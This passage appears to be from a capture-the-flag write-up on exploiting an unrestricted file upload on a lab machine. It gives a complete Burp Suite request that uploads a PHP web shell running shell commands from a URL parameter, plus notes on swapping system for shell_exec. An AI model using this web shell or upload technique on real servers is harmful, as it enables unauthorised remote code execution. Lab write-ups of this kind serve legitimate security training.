Unrestricted File Upload

As Paul, we have access to a file upload service to supposedly upload only zip files.

Of course, from the source code, we can obviously see that there are no upload restrictions at all. (Not even file type or file name)

Moreover, we control the file name to be uploaded in the task field. Using Burp Suite, we can send a PHP one liner to allow for remote code execution.

Upload malicious files

POST /portal/includes/fileController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="task"

nothing.php
------WebKitFormBoundaryHBZNum5szzVSddPn--

Notes

While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration.

Changing to shell_exec solves the issue.